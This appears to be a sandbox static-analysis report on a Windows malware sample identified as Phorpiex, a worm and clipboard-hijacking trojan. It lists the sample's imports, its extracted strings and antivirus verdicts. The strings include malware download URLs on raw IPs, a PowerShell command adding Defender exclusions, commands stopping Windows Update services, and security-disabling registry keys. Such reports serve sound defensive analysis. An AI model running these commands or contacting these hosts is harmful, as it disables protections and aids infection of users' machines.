Static | ZeroBOX

PE Compile Time

2024-10-10 16:39:16

PE Imphash

9b21a4a268f5e1d101db096fb67e8aea

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x0000ed86    0x0000ee00        6.12711020998
.rdata  0x00010000       0x00003ff2    0x00004000        5.38944022546
.data   0x00014000       0x00002e90    0x00001c00        5.66411091605

Imports

Library WS2_32.dll:
0x410210 gethostname
0x410214 recvfrom
0x410218 setsockopt
0x41021c bind
0x410220 sendto
0x410224 ioctlsocket
0x410228 WSAStartup
0x41022c shutdown
0x410230 htons
0x410234 socket
0x410238 connect
0x410240 listen
0x410244 WSASocketA
0x410248 WSACreateEvent
0x410250 WSAEventSelect
0x410258 WSAGetLastError
0x41025c WSASend
0x410260 WSARecv
0x410264 WSACloseEvent
0x410268 accept
0x41026c getpeername
0x410270 getsockname
0x410274 inet_addr
0x410278 gethostbyname
0x41027c inet_ntoa
0x410280 closesocket
0x410284 recv
0x410288 send
Library SHLWAPI.dll:
0x41015c StrStrIA
0x410160 StrCmpNW
0x410164 StrStrW
0x410168 PathFileExistsW
0x41016c StrChrA
0x410170 PathFindFileNameW
0x410174 StrCmpNIA
0x410178 PathMatchSpecW
Library urlmon.dll:
0x410308 URLDownloadToFileW
Library WININET.dll:
0x4101d8 InternetOpenW
0x4101dc InternetOpenUrlW
0x4101e0 InternetReadFile
0x4101e4 DeleteUrlCacheEntry
0x4101e8 InternetCloseHandle
0x4101ec HttpSendRequestA
0x4101f0 HttpOpenRequestA
0x4101f4 InternetConnectA
0x4101f8 InternetOpenA
0x4101fc InternetCrackUrlA
0x410204 HttpQueryInfoA
0x410208 InternetOpenUrlA
Library ntdll.dll:
0x4102a0 strlen
0x4102a4 iswdigit
0x4102a8 iswalpha
0x4102ac memcpy
0x4102b0 memset
0x4102b8 RtlUnwind
0x4102bc _chkstk
0x4102c0 _aulldiv
0x4102c4 wcslen
0x4102c8 wcscmp
0x4102cc _allshl
0x4102d0 _aullshr
0x4102d4 strstr
0x4102d8 strcmp
0x4102dc memmove
0x4102e0 memcmp
0x4102e8 NtQuerySystemTime
0x4102ec mbstowcs
Library msvcrt.dll:
0x410290 _vscprintf
0x410294 srand
0x410298 rand
Library KERNEL32.dll:
0x410028 GetSystemInfo
0x41002c FindClose
0x410030 SetEvent
0x410034 CreateProcessW
0x410038 GetLocaleInfoA
0x410040 GetCurrentThread
0x410044 GetThreadPriority
0x410048 SetThreadPriority
0x41004c GetCurrentProcess
0x410050 DuplicateHandle
0x410054 IsBadReadPtr
0x410060 WaitForSingleObject
0x410068 InterlockedExchange
0x41006c HeapFree
0x410070 HeapValidate
0x410074 HeapReAlloc
0x410078 GetProcessHeaps
0x41007c HeapCreate
0x410080 HeapSetInformation
0x410084 GetCurrentProcessId
0x410088 HeapAlloc
0x41008c CreateMutexA
0x410090 GetLastError
0x410094 ExitProcess
0x410098 CreateEventA
0x41009c CreateThread
0x4100a0 GetModuleFileNameW
0x4100a8 GetDiskFreeSpaceExW
0x4100ac SetFileAttributesW
0x4100b0 CopyFileW
0x4100b4 lstrcmpiW
0x4100b8 CreateDirectoryW
0x4100bc FindFirstFileW
0x4100c0 lstrcmpW
0x4100c4 MoveFileExW
0x4100c8 FindNextFileW
0x4100d0 RemoveDirectoryW
0x4100d8 DeleteFileW
0x4100dc GetLogicalDrives
0x4100e0 GetDriveTypeW
0x4100e4 QueryDosDeviceW
0x4100e8 lstrcpyW
0x4100ec WriteFile
0x4100f0 FlushFileBuffers
0x410100 CreateFileW
0x410104 CreateFileMappingW
0x410108 MapViewOfFile
0x41010c GetFileSize
0x410110 UnmapViewOfFile
0x410114 lstrlenW
0x410118 GlobalUnlock
0x41011c GlobalLock
0x410120 GlobalAlloc
0x410124 lstrlenA
0x410128 lstrcpynW
0x41012c MultiByteToWideChar
0x410130 ExitThread
0x410134 GetTickCount
0x410138 Sleep
0x41013c GetModuleHandleW
0x410140 CloseHandle
Library USER32.dll:
0x410180 RegisterClassExW
0x410184 CreateWindowExW
0x410188 GetMessageA
0x41018c TranslateMessage
0x410190 wsprintfW
0x410194 DefWindowProcA
0x4101a0 GetClipboardData
0x4101a4 DispatchMessageA
0x4101a8 OpenClipboard
0x4101ac EmptyClipboard
0x4101b0 SetClipboardData
0x4101b8 SendMessageA
0x4101bc SetWindowLongW
0x4101c0 SetClipboardViewer
0x4101c4 GetWindowLongW
0x4101c8 wsprintfA
0x4101cc wvsprintfA
0x4101d0 CloseClipboard
Library ADVAPI32.dll:
0x410004 RegQueryValueExW
0x410008 RegOpenKeyExW
0x41000c RegSetValueExW
0x410010 CryptReleaseContext
0x410014 RegCloseKey
0x410018 CryptGenRandom
Library SHELL32.dll:
0x410154 ShellExecuteW
Library ole32.dll:
0x4102f4 CoInitializeEx
0x4102f8 CoUninitialize
0x4102fc CoInitialize
0x410300 CoCreateInstance
Library OLEAUT32.dll:
0x410148 SysFreeString
0x41014c SysAllocString

!This program cannot be run in DOS mode.
http://185.215.113.66/
http://91.202.233.141/
www.update.microsoft.com
0.0.0.0
TCP: P2P_SendGETLPacket(0,%s) failed!
HTTP/1.1 200 OK
LOCATION:
239.255.255.250
M-SEARCH * HTTP/1.1
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
Man:"ssdp:discover"
HOST: 239.255.255.250:1900
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Content-Type: text/xml; charset="utf-8"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"/></SOAP-ENV:Body></SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:DeletePortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost>%s</NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
</m:DeletePortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
WS2_32.dll
StrStrW
StrCmpNW
PathMatchSpecW
PathFileExistsW
StrChrA
PathFindFileNameW
StrStrIA
StrCmpNIA
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
DeleteUrlCacheEntry
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetOpenA
InternetCrackUrlA
HttpAddRequestHeadersA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
memcpy
strlen
memset
iswdigit
iswalpha
_chkstk
_aulldiv
wcslen
wcscmp
_allshl
_aullshr
strstr
strcmp
memmove
memcmp
RtlTimeToSecondsSince1980
NtQuerySystemTime
mbstowcs
ntdll.dll
RtlUnwind
NtQueryVirtualMemory
_vscprintf
msvcrt.dll
lstrlenW
GlobalUnlock
GlobalLock
GlobalAlloc
lstrlenA
lstrcpynW
MultiByteToWideChar
ExitThread
GetTickCount
GetModuleHandleW
CloseHandle
UnmapViewOfFile
GetFileSize
MapViewOfFile
CreateFileMappingW
CreateFileW
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
FlushFileBuffers
WriteFile
lstrcpyW
QueryDosDeviceW
GetDriveTypeW
GetLogicalDrives
DeleteFileW
ExpandEnvironmentStringsW
RemoveDirectoryW
FindClose
FindNextFileW
MoveFileExW
lstrcmpW
FindFirstFileW
CreateDirectoryW
lstrcmpiW
CopyFileW
SetFileAttributesW
GetDiskFreeSpaceExW
GetVolumeInformationW
GetModuleFileNameW
CreateThread
CreateEventA
ExitProcess
GetLastError
CreateMutexA
HeapAlloc
GetCurrentProcessId
HeapSetInformation
HeapCreate
GetProcessHeaps
HeapReAlloc
HeapValidate
HeapFree
InterlockedExchange
InterlockedDecrement
WaitForSingleObject
InterlockedIncrement
InterlockedExchangeAdd
IsBadReadPtr
DuplicateHandle
GetCurrentProcess
SetThreadPriority
GetThreadPriority
GetCurrentThread
DeleteCriticalSection
GetLocaleInfoA
CreateProcessW
KERNEL32.dll
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DispatchMessageA
TranslateMessage
GetMessageA
CreateWindowExW
RegisterClassExW
wsprintfW
DefWindowProcA
ChangeClipboardChain
RegisterRawInputDevices
GetClipboardData
IsClipboardFormatAvailable
SendMessageA
SetWindowLongW
SetClipboardViewer
GetWindowLongW
wsprintfA
wvsprintfA
USER32.dll
RegCloseKey
RegQueryValueExW
RegOpenKeyExW
RegSetValueExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CoInitializeEx
ole32.dll
OLEAUT32.dll
WSAWaitForMultipleEvents
WSASocketA
WSACreateEvent
WSAGetOverlappedResult
WSAEventSelect
WSAEnumNetworkEvents
WSASend
WSARecv
WSACloseEvent
SetEvent
GetQueuedCompletionStatus
PostQueuedCompletionStatus
GetSystemInfo
CreateIoCompletionPort
Oct 10 2024 00:39:06
Oct 10 2024 00:39:07
0123456789
0123456789abcdef
mmn7nnm8na
0123456789abcdef
bitcoincash:
cosmos
bitcoincash:
ronin:
yronin:
bitcoincash:
cosmos
gnano_
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
%temp%
%s\%d%d.exe
%comspec%
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
http://185.215.113.66/tdrp.exe
%s:Zone.Identifier
/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe
/c start %s & start %s\rvlcfg.exe
%s.lnk
%s\%s\rvlcfg.exe
%s\%s\rvldrv.exe
shell32.dll
shell32.dll
shell32.dll
shell32.dll
Thumbs.db
$RECYCLE.BIN
desktop.ini
System Volume Information
%s\%s\%s
(%dGB)
Unnamed volume
Microsoft Corporation
%s:Zone.Identifier
%userprofile%
%windir%
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%temp%
Software\Microsoft\Windows\CurrentVersion\Run\
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmd.exe
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
cmd.exe
SYSTEM\CurrentControlSet\Services\UsoSvc
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc
SYSTEM\CurrentControlSet\Services\wuauserv
SYSTEM\CurrentControlSet\Services\DoSvc
SYSTEM\CurrentControlSet\Services\BITS
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
DisableWindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate
AlwaysAutoUpdate
OverrideNotice
SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator
DisableWindowsUpdate
AutoUpdateOptions
EnableWindowsUpdate
PreventDownload
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
%s\tbtnds.dat
%s\tbtcmds.dat
service
serviceType
serviceList
device
deviceType
deviceList
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
controlURL
URLBase
GetExternalIPAddressResponse
NewExternalIPAddress
6%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
sysppvrdnvs.exe
Windows Settings
Antivirus Signature
Bkav W32.Common.E642E683
Lionic Trojan.Win32.Phorpiex.7!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Worm.Generic
Skyhigh BehavesLike.Win32.Generic.mh
ALYac Trojan.GenericKD.74476180
Cylance Unsafe
Zillya Worm.Phorpiex.Win32.3206
CrowdStrike win/malicious_confidence_100% (D)
Alibaba TrojanBanker:Win32/Phorpiex.db75a2fd
K7GW Trojan ( 005533551 )
K7AntiVirus Trojan ( 005533551 )
huorong TrojanSpy/Stealer.it
Baidu Clean
VirIT Trojan.Win32.Genus.WSC
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Phorpiex.V
APEX Malicious
Avast Win32:KadrBot [Trj]
Cynet Malicious (score: 100)
Kaspersky Trojan-Banker.Win32.ClipBanker.acow
BitDefender Trojan.GenericKD.74476180
NANO-Antivirus Trojan.Win32.Phorpiex.kspiyh
ViRobot Trojan.Win.Z.Phorpiex.85504
MicroWorld-eScan Trojan.GenericKD.74476180
Tencent Malware.Win32.Gencirc.141d0d0c
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.Twizt.nopsy
DrWeb Trojan.Siggen29.49973
VIPRE Trojan.GenericKD.74476180
TrendMicro TROJ_GEN.R002C0DJO24
McAfeeD Real Protect-LS!06560B5E92D7
Trapmine malicious.high.ml.score
CTX exe.trojan.phorpiex
Emsisoft Trojan.GenericKD.74476180 (B)
Ikarus Trojan.Win32.Phorpiex
FireEye Generic.mg.06560b5e92d70439
Jiangmin Clean
Webroot Clean
Varist Clean
Avira TR/AVI.Twizt.nopsy
Fortinet W32/Phorpiex.V!worm
Antiy-AVL Clean
Kingsoft Win32.HeurC.KVMH012.a
Gridinsoft Trojan.Win32.Phorpiex.sa
Xcitium Malware@#1ny8378ets6m4
Arcabit Trojan.Generic.D4706A94
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Worm.Win32.Generic
Microsoft Trojan:Win32/Phorpiex.RA!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C4630408
Acronis Clean
McAfee Artemis!06560B5E92D7
TACHYON Clean
VBA32 Worm.Propriex
Malwarebytes Phorpiex.Trojan.Bot.DDS
Panda Adware/SecurityProtection
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DJO24
Rising Worm.Phorpiex!1.DF9C (CLASSIC)
Yandex Worm.Phorpiex!OmjwZqs2d3c
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.121218.susgen
GData Win32.Trojan.Phorpiex.D
AVG Win32:KadrBot [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.